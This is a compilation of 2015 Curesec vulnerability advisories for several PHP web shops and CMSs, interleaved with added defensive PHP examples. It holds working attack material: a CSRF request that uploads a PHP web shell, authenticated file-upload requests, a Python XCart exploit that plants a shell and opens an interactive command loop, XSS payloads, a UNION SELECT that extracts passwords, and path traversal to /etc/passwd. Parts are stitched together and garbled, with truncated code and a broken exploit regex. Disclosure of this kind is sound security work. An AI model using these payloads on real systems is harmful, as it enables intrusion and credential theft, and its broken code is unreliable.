function submitRequest() {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://localhost/Sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages%2Fdemo", true);
    xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
    xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---72100436920187879541838388265");
    xhr.withCredentials = true;
    var body = "-72100436920187879541838388265\r\n" +
        "Content-Disposition: form-data; name=\"SMInputSMFilesUpload\"; filename=\"shell.php\"\r\n" +
        "Content-Type: application/x-php\r\n" +
        "\r\n" +
        "\x3c?php passthru($_GET[\'x\']); ?\x3e\n" +
        "\r\n" +
        "-72100436920187879541838388265\r\n" +
        "Content-Disposition: form-data; name=\"SMPostBackControl\"\r\n" +
        "\r\n" +
        "\r\n" +
        "-72100436920187879541838388265--\r\n";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
}

6. Solution

To mitigate this issue please upgrade at least to version 4.1.1:

http://sitemagic.org/index.php?SMExt=SMDownloads&SMDownloadsFile=
SitemagicCMS411.zip

Please note that a newer version might already be available.

7. Report Timeline

09/29/2015 Informed Vendor about Issue
09/29/2015 Vendor releases fix
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/Sitemagic-CMS-41-XSS-91.html



[FD] Thelia 2.2.1: XSS

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Thelia 2.2.1
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Contact:      i...@thelia.net
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 11/13/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

Thelia 2.2.1 suffers from an XSS vulnerability. With this, it is for example
possible to inject JavaScript keyloggers, or to bypass CSRF protection.

3. Proof of Concept


http://localhost/thelia_2.1.5/web/admin/home/stats?month=95&year=20155

4. Solution

This issue has not been fixed by the vendor.

5. Report Timeline

09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/Thelia-221-XSS-90.html



[FD] TomatoCart v1.1.8.6.1: XSS

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    TomatoCart v1.1.8.6.1
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Contact:      supp...@tomatocart.com
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 11/13/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

There are two reflected XSS vulnerabilities in TomatoCart v1.1.8.6.1. With
this, it is possible to inject JavaScript keyloggers, or to bypass CSRF
protection, which in the case of TomatoCart may lead to code execution.

3. XSS 1

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Proof of Concept


http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/info.php?faqs&faqs_id='">alert(1)

Code


templates/bootstrap/content/info/faqs.php:70
if(question.getParent().id == 'faq') {
    question.getElement('i').set('class', 'icon-minus');
    question.getNext().setStyle('display', '');
}

4. XSS 2

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Proof of Concept


http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/checkout.php?checkout&view='">alert(1)

Code


templates/bootstrap/content/checkout/checkout.php:182
view: '',

5. Solution

This issue has not been fixed by the vendor.

6. Report Timeline

09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/TomatoCart-v11861-XSS-89.html



[FD] TomatoCart v1.1.8.6.1: Code Execution

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    TomatoCart v1.1.8.6.1
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Contact:      supp...@tomatocart.com
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 11/13/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

TomatoCart has multiple locations where the upload of images is allowed. In two
of these locations, the file type and extension of the uploaded file are not
checked, which leads to code execution.

Please note that an admin account with at least some privileges is required to
exploit this issue.

3. Code Execution 1

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When uploading a new slide image, there are no checks as to what type the
uploaded image actually is. Because of this, an attacker that gained admin
credentials can upload a PHP file and thus gain code execution.

The rights needed are Content -> Slide Images.

Proof of Concept


curl -i -s -k  -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=1106460043' \
-b 'toCAdminID=4tfpeotn6bp65cm70mcekauhk1; 
PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \
--data-binary $'--1106460043\x0d\x0aContent-Disposition: form-data; 
name=\"image1\"; filename=\"test2.php\"\x0d\x0aContent-Type: 
application/x-php\x0d\x0a\x0d\x0ahttp://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/admin/json.php'

4. Code Execution 2

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When uploading a new product image, there are no checks as to what type the
uploaded image actually is. Because of this, an attacker that gained admin
credentials can upload a PHP file and thus gain code execution.

The rights needed are Content -> Products.

Proof of Concept


curl -i -s -k  -X 'POST' \
-H 'Content-Type: multipart/form-data; boundary=1775010584' \
-b 'toCAdminID=4tfpeotn6bp65cm70mcekauhk1; 
PHPSESSID=6hioh2kisld85o5f3qo3e5gf86' \
--data-binary $'--1775010584\x0d\x0aContent-Disposition: form-data; 
name=\"APC_UPLOAD_PROGRESS\"\x0d\x0a\x0d\x0a5305684637\x0d\x0a--1775010584\x0d\x0aContent-Disposition:
 form-data; 
name=\"UPLOAD_IDENTIFIER\"\x0d\x0a\x0d\x0a5305684637\x0d\x0a--1775010584\x0d\x0aContent-Disposition:
 form-data; 
name=\"MAX_FILE_SIZE\"\x0d\x0a\x0d\x0a4194304\x0d\x0a--1775010584\x0d\x0aContent-Disposition:
 form-data; name=\"ext-gen4881\"; filename=\"test.php\"\x0d\x0aContent-Type: 
application/x-php\x0d\x0a\x0d\x0ahttp://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/admin/json.php?module=products&action=upload_image'
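An image upload handler that validates by content and chooses the stored extension itself, added here as an example and not TomatoCart code. It assumes one $_FILES entry passed as $file, a writable destination directory, and the finfo and GD functions of a standard PHP build; the function name is illustrative. Both advisories above turn on the same missing check, so one handler covers slide images and product images alike.

```php
<?php
// Added example, not TomatoCart code: content-based validation of an
// uploaded image, with a server-chosen name so the client-supplied
// filename (test.php in the proof of concept) never decides the handler.
function storeUploadedImage(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    $tmp = $file['tmp_name'];
    // Refuse anything that did not arrive through this request's upload.
    if (!is_uploaded_file($tmp)) {
        throw new RuntimeException('not an uploaded file');
    }
    // Type from content, never from the client's Content-Type part header,
    // which the curl requests above set to whatever they like.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    $extByMime = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];
    if (!isset($extByMime[$mime])) {
        throw new RuntimeException("unsupported type $mime");
    }
    // getimagesize parses the real image header and must agree with finfo.
    // A polyglot (image header followed by PHP) can still pass both, which
    // is why the extension and directory policy below matter as well.
    $info = @getimagesize($tmp);
    if ($info === false || image_type_to_mime_type($info[2]) !== $mime) {
        throw new RuntimeException('file is not a decodable image');
    }
    // Random server-chosen name; extension derives from the detected type,
    // so the stored file can never end in .php whatever the client sent.
    $name = bin2hex(random_bytes(16)) . '.' . $extByMime[$mime];
    $dest = rtrim($destDir, '/') . '/' . $name;
    if (!move_uploaded_file($tmp, $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}
```

Serve the destination directory with script execution disabled (for mod_php, php_flag engine off in that directory, or a SetHandler override) so that even a polyglot that passes the checks is only ever delivered as an image.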

5. Solution

This issue has not been fixed by the vendor.

6. Report Timeline

09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/TomatoCart-v11861-Code-Execution-88.html



[FD] XCart 5.2.6: Code Execution Exploit

2015-11-14 Thread Curesec Research Team (CRT)

#!/usr/local/bin/python
# Exploit for XCart 5.2.6 Code Execution vulnerability
# An admin account is required to use this exploit
# Curesec GmbH

import sys
import re
import requests # requires requests lib

if len(sys.argv) != 4:
    exit("usage: python " + sys.argv[0] + " http://example.com/xcart/ ad...@example.com admin")

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

loginPath = "/admin.php?target=login"
fileManagerPath = "/admin.php?target=logo_favicon"

shellFileName = "404.php"
shellContent = "GIF89a;"

def login(requestSession, url, username, password):
    csrfRequest = requestSession.get(url)
    csrfTokenRegEx = re.search('name="xcart_form_id" type="hidden" value="(.*)" class', csrfRequest.text)
    csrfToken = csrfTokenRegEx.group(1)

    postData = {"target": "login", "action": "login", "xcart_form_id": csrfToken, "login": username, "password": password}
    loginResult = requestSession.post(url, data = postData).text
    return "Invalid login or password" not in loginResult

def upload(requestSession, url, fileName, fileContent):
    csrfRequest = requestSession.get(url)
    csrfTokenRegEx = re.search('SimpleCMS" />\n', csrfRequest.text)
    csrfToken = csrfTokenRegEx.group(1)

    filesData = {"logo": (fileName, fileContent)}
    postData = {"target": "logo_favicon", "action": "update", "page": "CDev\SimpleCMS", "xcart_form_id": csrfToken}
    uploadResult = requestSession.post(url, files = filesData, data = postData)
    return "The data has been saved successfully" in uploadResult.text

def runShell(url):
    print("enter command, or enter exit to quit.")
    command = raw_input("$ ")
    while "exit" not in command:
        print(requests.get(url + command).text.replace("GIF89a;", ""))
        command = raw_input("$ ")


requestSession = requests.session()

if login(requestSession, url + loginPath, username, password):
    print("successful: login")
else:
    exit("ERROR: Incorrect username or password")

if upload(requestSession, url + fileManagerPath, shellFileName, shellContent):
    print("successful: file uploaded")
else:
    exit("ERROR: could not upload file")

runShell(url + shellFileName + "?x=")


Blog Reference:
http://blog.curesec.com/article/blog/XCart-526-Code-Execution-Exploit-87.html



[FD] XCart 5.2.6: Code Execution

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    XCart 5.2.6
Fixed in:            5.2.7
Fixed Version Link:  https://www.x-cart.com/xc5kit
Vendor Contact:      supp...@x-cart.com
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  08/13/2015
Disclosed to public: 11/04/2015
Release mode:        Coordinated release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Vulnerability Description

When uploading a favicon (http://localhost/anew/xcart/admin.php?target=
logo_favicon), there is no check as to what type or extension the file has.
This allows an attacker that gained admin credentials to upload a PHP file and
thus gain code execution.

3. Solution

To mitigate this issue please upgrade at least to version 5.2.7:

https://www.x-cart.com/xc5kit

Please note that a newer version might already be available.

4. Report Timeline

08/13/2015 Informed Vendor about Issue
09/03/2015 Vendor Requests more time
10/19/2015 Vendor releases fix
11/04/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/XCart-526-Code-Execution-86.html



[FD] XCart 5.2.6: Path Traversal

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    XCart 5.2.6
Fixed in:            5.2.7
Fixed Version Link:  https://www.x-cart.com/xc5kit
Vendor Contact:      supp...@x-cart.com
Vulnerability Type:  Path Traversal
Remote Exploitable:  Yes
Reported to vendor:  08/13/2015
Disclosed to public: 11/04/2015
Release mode:        Coordinated release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Arbitrary File Download

Description

When downloading a file, the input is not properly protected against directory
traversal, which makes it possible to download arbitrary files.

Please note that admin credentials are required.

Proof of Concept


http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php
POST: 
path=/////////////////..etc/passwd&name=download.txt

Code


/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/force_download.php:10
$path=joinPaths($root,$upload_dir,$_POST['path']);
$path=str_replace(LC_DS . '..', '', $path);
$name=$_POST['name'];

header('Pragma: private');
header('Cache-control: private, must-revalidate');
header("Content-Type: application/octet-stream");
header("Content-Length: " .(string)(filesize($path)) );
header('Content-Disposition: attachment; filename="'.($name).'"');
readfile($path);
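A containment check for that download handler, added here as an example and not X-Cart code. It assumes a fixed upload directory passed as $baseDir and the client-supplied path from $_POST['path'] as $relative; function names are illustrative. The difference from the quoted code is that the file system's canonical path, not a string substitution of "..", decides whether the file lies inside the upload directory.

```php
<?php
// Added example, not X-Cart code: resolve a client-supplied path inside a
// fixed directory and refuse anything that resolves outside it.
function resolveWithin(string $baseDir, string $relative): string
{
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('upload directory does not exist');
    }
    // NUL would truncate the path in the C-level file functions.
    if (strpos($relative, "\0") !== false) {
        throw new InvalidArgumentException('invalid path');
    }
    // realpath canonicalises "..", repeated slashes and symlinks, and
    // returns false for a file that does not exist, which is also a refusal.
    // Stripping "/.." from the string, as force_download.php does, leaves
    // other spellings of the same traversal untouched; this does not.
    $target = realpath($base . DIRECTORY_SEPARATOR . $relative);
    if ($target === false) {
        throw new RuntimeException('file not found');
    }
    // Prefix check with the separator included, so a sibling directory
    // whose name merely starts with the base name does not pass.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($target !== $base && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('path escapes upload directory');
    }
    if (!is_file($target)) {
        throw new RuntimeException('not a regular file');
    }
    return $target;
}

// The download name is derived from the stored file, not from $_POST['name'],
// and restricted to a conservative character set for the header.
function downloadName(string $target): string
{
    $name = basename($target);
    return preg_replace('/[^A-Za-z0-9._-]/', '_', $name) ?: 'download';
}

// Handler sketch (constructed base directory):
// $file = resolveWithin('/var/www/xcart/files', $_POST['path'] ?? '');
// header('Content-Type: application/octet-stream');
// header('Content-Length: ' . filesize($file));
// header('Content-Disposition: attachment; filename="' . downloadName($file) . '"');
// readfile($file);
```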

3. List Directories

Description

It is possible to list the directories contained by any directory due to a
directory traversal vulnerability via the fldr POST argument. This may be used
to gather information about the target system.

Please note that admin credentials are required.

Proof of Concept


http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?type=0&editor=mce_0&popup=0&lang=en_EN&field_id=&fldr=../../../../../../

4. Solution

To mitigate this issue please upgrade at least to version 5.2.7:

https://www.x-cart.com/xc5kit

Please note that a newer version might already be available.

5. Report Timeline

08/13/2015 Informed Vendor about Issue
09/03/2015 Vendor Requests more time
10/19/2015 Vendor releases fix
11/04/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/XCart-526-Path-Traversal-85.html



[FD] XCart 5.2.6: XSS

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    XCart 5.2.6
Fixed in:            5.2.7
Fixed Version Link:  https://www.x-cart.com/xc5kit
Vendor Contact:      supp...@x-cart.com
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  08/13/2015
Disclosed to public: 11/04/2015
Release mode:        Coordinated release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Vulnerability Description

There are multiple XSS vulnerabilities in the dialog.php file. This allows an
attacker to execute arbitrary JavaScript in the context of the browser of a
victim if the victim clicks on an attacker supplied link or visits an attacker
controlled website. With this, it is possible to bypass CSRF protection and
thus do anything the victim can do, inject a JavaScript keylogger, or perform
phishing attacks.

3. Proof of Concept


http://localhost/anew/xcart/skins/admin/en/modules/CDev/TinyMCE/js/tinymce/plugins/filemanager/dialog.php?editor=";>alert(1)&lang=">alert(2)&field_id=">alert(3)&fldr=">alert(4)&type=">alert(5)

4. Solution

To mitigate this issue please upgrade at least to version 5.2.7:

https://www.x-cart.com/xc5kit

Please note that a newer version might already be available.

5. Report Timeline

08/13/2015 Informed Vendor about Issue
09/03/2015 Vendor Requests more time
10/19/2015 Vendor releases fix
11/04/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/XCart-526-XSS-84.html



[FD] SQLiteManager 1.2.4: Multiple XSS

2015-11-06 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:   SQLiteManager 1.2.4 
Fixed in:   not fixed
Fixed Version Link: n/a 
Vendor Contact: sqlitemana...@gmail.com 
Vulnerability Type: XSS 
Remote Exploitable: Yes 
Reported to vendor: 09/01/2015  
Disclosed to public:10/07/2015  
Release mode:   Full Disclosure 
CVE:n/a 
Credits Tim Coen of Curesec GmbH

2. Vulnerability Description

There are multiple XSS vulnerabilities in SQLiteManager 1.2.4. With
this, it is possible to steal cookies, bypass CSRF protection, or inject
JavaScript keyloggers.

3. Proof of Concept


http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&function=";>alert(1)
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&table=";>alert(1)
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&trigger=";>alert(1)
http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&view=";>alert(1)

http://localhost/SQLiteManager-1.2.4/main.php?dbsel=2&action=browseItem&DisplayQuery=alert(1)

http://localhost/SQLiteManager-1.2.4/main.php?dbsel=1&table=t1&action=insertElement¤tPage=0'">alert(1)

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015  Informed Vendor about Issue (no reply)
09/22/2015  Reminded Vendor of disclosure date (no reply)
10/07/2015  Disclosed to public

6. Blog Reference:
http://blog.curesec.com/article/blog/SQLiteManager-124-Multiple-XSS-67.html


[FD] TheHostingTool 1.2.6: Multiple XSS

2015-11-06 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:TheHostingTool 1.2.6
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  https://thehostingtool.com/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/07/2015
Disclosed to public: 10/07/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Description

There are two reflected and one persistent XSS vulnerability in TheHostingTool
1.2.6. With these, it is possible to bypass CSRF protection, inject JavaScript
keyloggers, or perform phishing attacks.

3. Details

Reflected XSS 1

Proof of Concept:


http://localhost/ecommerce/THTv1.2.6/includes/ajax.php?function=notice&message=alert(1)&status

Code:


includes/ajax.php
function notice() {
    global $style;
    if(isset($_REQUEST['status']) and isset($_REQUEST['message'])) {
        if($_REQUEST['status'] == "good") {
            $status = true;
        } else {
            $status = false;
        }
        // the request-controlled message is passed through unencoded
        echo $style->notice($status, $_REQUEST['message']);
    }
    return true;
}

includes/class_style.php
public function notice($good, $message) {
    if($good) {
        //Cool! Everything's OK.
        $color = "green";
    }
    else {
        //Oh no! It's a bad message!
        $color = "red";
    }
    // opening/closing markup around the message not preserved in this archive copy
    $notice = '';
    $notice .= $message;
    $notice .= '';
    return $notice;
}

Reflected XSS 2

Proof of Concept:


http://localhost//ecommerce/THTv1.2.6/admin/?page=invoices&pay&iid=";>alert(1)

Code:


invoices.php:
class page {
    public function content(){ # Displays the page
        global $style, $db, $main, $invoice;
        if(isset($_GET['iid']) and isset($_GET['pay'])){
            $invoice->set_paid($_GET['iid']);
            echo "Invoice #{$_GET['iid']} marked as paid. Undo this action";
        }
        elseif(isset($_GET['iid']) and isset($_GET['unpay'])){
            $invoice->set_unpaid($_GET['iid']);
            echo "Invoice {$_GET['iid']} marked as unpaid. Undo this action";
        }

Persistent XSS

Proof of Concept:

 1. Create a new order here: http://localhost/ecommerce/THTv1.2.6/order/
 2. When asked for a domain, enter: http://ex.alert(1).com
 3. Visit http://localhost/ecommerce/THTv1.2.6/admin/?page=logs or
    http://localhost/ecommerce/THTv1.2.6/admin/?page=users&sub=search&do=USERID

4. Solution

This issue has not been fixed.

5. Report Timeline

09/07/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/TheHostingTool-126-Multiple-XSS-78.html



[FD] TheHostingTool 1.2.6: Multiple SQL Injection

2015-11-06 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:TheHostingTool 1.2.6
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  https://thehostingtool.com/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  09/07/2015
Disclosed to public: 10/07/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Description

There are three SQL Injections in the admin area of TheHostingTool 1.2.6.

The problem is that the defense against SQL Injection depends in part on the
global GET and POST variables being sanitized using mysql_real_escape_string if
accessed via postvar or getvar.

This makes them relatively safe to use in a query if the parameter is
surrounded by quotes. But for places where the parameter is not surrounded by
quotes, this will not prevent SQL injection.

Please note that admin credentials are required for all SQL injections shown
here.

3. Details

SQL Injection 1

The POST value "type" is used as the column name in a WHERE clause when using
the ajax search. Encoding single quotes does not prevent SQL injection in this
case.

It should also be noted that letting the user choose the column of a LIKE query
on a user table is not a good idea in general, as it will be easy to iterate
passwords this way.

Proof of Concept:


POST http://localhost/ecommerce/THTv1.2.6/includes/ajax.php?function=search
type=user` %3D 1 union all select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from tht_users %23&value=test

Code:


includes/ajax.php
public function search() {
global $main, $db, $style;
if($_SESSION['logged']) {
//echo '
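
As an added example that is not TheHostingTool's code, the hardened form of such a search: the column name comes from a fixed allowlist and the search value is bound as a parameter. It runs against an in-memory SQLite table standing in for tht_users; the schema, rows and allowed columns are assumptions.

```php
<?php
// Added example, not TheHostingTool code: a search whose column name comes
// from a fixed allowlist and whose value is bound as a parameter. The
// in-memory SQLite table, its rows and the allowed columns are constructed
// stand-ins for tht_users.

// Columns a search may select on (assumed). The password column is
// deliberately absent. Escaping cannot help in this position: a column name
// is not a quoted string literal, so quote escaping never applies to it.
const SEARCHABLE_COLUMNS = ['user', 'email'];

function buildSearch(PDO $db, string $type, string $value): array
{
    if (!in_array($type, SEARCHABLE_COLUMNS, true)) {
        // Reject before any SQL is assembled; the identifier reaches the
        // query text only if it is one of the fixed names above.
        throw new InvalidArgumentException('unsupported search column: ' . $type);
    }
    // The value travels as a bound parameter, so quotes, % or comment
    // markers inside it are data, not syntax.
    $stmt = $db->prepare("SELECT id, user, email FROM tht_users WHERE `$type` LIKE :pattern");
    $stmt->execute([':pattern' => '%' . $value . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tht_users (id INTEGER PRIMARY KEY, user TEXT, email TEXT, password TEXT)');
$db->exec("INSERT INTO tht_users (user, email, password) VALUES
    ('alice', 'alice@example.test', 'hash1'),
    ('bob',   'bob@example.test',   'hash2')");

print_r(buildSearch($db, 'user', 'ali'));      // the alice row only

try {
    buildSearch($db, 'password', 'h');          // column is not allowlisted
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
```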

[FD] TheHostingTool 1.2.6: Code Execution

2015-11-06 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:TheHostingTool 1.2.6
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  https://thehostingtool.com/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  09/07/2015
Disclosed to public: 10/07/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Description

Themes can be uploaded via a zip file by an admin. The uploader checks the
validity of each file with a blacklist.

The blacklist misses at least two file types that will lead to code execution:
any file with the extension .pht, which will be executed by most default
Apache configurations, and the .htaccess file, which, if parsed by the server,
allows code execution for files with arbitrary extensions. It is recommended
to use a whitelist instead of a blacklist.

Please note that admin credentials are required to exploit this issue.

3. Code


lof.php
if(preg_match('/^.+\.((?:php[3-5]?)|(?:cgi)|(?:pl)|(?:phtml))$/i', basename($stat['name']), $regs2)) {
    $errors[] = strtoupper($regs2[1]) . ' is not a valid file type in a theme zip.';
    $insecureZip = true;
    break;
}

4. Solution

This issue has not been fixed.

5. Report Timeline

09/07/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/TheHostingTool-126-Code-Execution-75.html

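
As an added example (not TheHostingTool's code), the advisory's blacklist regex beside an extension allowlist for theme-zip entries, run over a few constructed entry names; the set of allowed extensions is an assumption.

```php
<?php
// Added example, not TheHostingTool code: the advisory's blacklist regex
// beside an extension allowlist for theme-zip entries. The allowed
// extensions and the sample entry names are assumptions.

// Blacklist exactly as it appears in the advisory's lof.php excerpt.
function blacklistRejects(string $name): bool
{
    return (bool) preg_match(
        '/^.+\.((?:php[3-5]?)|(?:cgi)|(?:pl)|(?:phtml))$/i',
        basename($name)
    );
}

// Assumed allowlist of what a theme legitimately ships.
const THEME_ALLOWED_EXTENSIONS = ['css', 'js', 'png', 'jpg', 'gif', 'tpl', 'html'];

function allowlistAccepts(string $name): bool
{
    $base = basename($name);
    // Dotfiles such as .htaccess carry server directives, not theme content;
    // they have no usable extension and are rejected outright.
    if ($base === '' || $base[0] === '.') {
        return false;
    }
    $dot = strrpos($base, '.');
    if ($dot === false) {
        return false;                    // no extension at all
    }
    // Only the final extension counts, so a double extension still has to
    // end in an allowed type.
    $ext = strtolower(substr($base, $dot + 1));
    return in_array($ext, THEME_ALLOWED_EXTENSIONS, true);
}

// Constructed entries, including the two types the advisory names.
$entries = ['style.css', 'img/logo.png', 'theme.php', 'theme.pht', '.htaccess', 'theme.php.txt'];
foreach ($entries as $entry) {
    printf("%-14s blacklist rejects: %-4s allowlist accepts: %s\n",
        $entry,
        blacklistRejects($entry) ? 'yes' : 'no',
        allowlistAccepts($entry) ? 'yes' : 'no');
}
```

The table printed shows the gap the advisory describes: theme.pht and .htaccess pass the blacklist but are refused by the allowlist.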


[FD] Quick.Cart 6.6: Multiple XSS

2015-11-06 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Quick.Cart 6.6
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Contact:  i...@opensolution.org
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/07/2015
Disclosed to public: 10/07/2015
Release mode:Coordinated release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Description

Quick.Cart 6.6 is vulnerable to multiple reflected XSS attacks. With this, it
is possible to inject a JavaScript keylogger or perform phishing attacks.

The vulnerabilities are all in the admin.php file. To add security through
obscurity, Quick.Cart suggests renaming this file, which would make it more
difficult to exploit these vulnerabilities. The renaming is not mandatory.

The vulnerabilities detailed below depend on the fact that the main entry
points for users and admins contain a call to extract:


index.php
extract( $_GET );

admin.php
extract( $_GET );

With this, it is possible to overwrite or set any variable. Because of this, it
is not considered best practice to pass user input to extract.

The SESSION variable cannot be set by an attacker, because session_start is
called after extract, but variables such as SERVER or COOKIE and undefined
variables can be set.

This call also makes it possible to send POST requests via GET, making the
exploitation of, for example, CSRF easier. It may have further negative effects
as well.

3. Details

XSS 1

Proof of Concept:


http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=orders-list&iStatus=";>alert(1)
http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=orders-list&iProducts=";>alert('xss')

Code:


templates/admin/orders.php


XSS 2

Proof of Concept:


http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=lang-translations&sLanguage=alert(1)

Code:


templates/admin/languages.php


XSS 3

Proof of Concept:


http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?_COOKIE[sLogin]="; autofocus onfocus="alert('xss')

Code:


common-admin.php
$content = '
  AddOnload( cursor );
'.$lang['Login'].':'.$lang['Password'].':';

XSS 4

Proof of Concept:


http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?_SERVER[HTTP_HOST]=";>alert(1)&_SERVER[SCRIPT_FILENAME]=/var/www/ecommerce/Quick.Cart_v6.6/admin.php

Please note that the SCRIPT_FILENAME must be set correctly, as it's used as the
name of the session key and overwriting one SERVER value leads to the deletion
of all other SERVER values.

Code:


core/libraries/trash.php
$GLOBALS['lang']['Language'] .= 'http://opensolution.org/news,.html?sUrl='.$_SERVER['HTTP_HOST'].'" style="display:none;">';

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/07/2015 Informed Vendor about Issue
10/01/2015 Reminded Vendor of release date
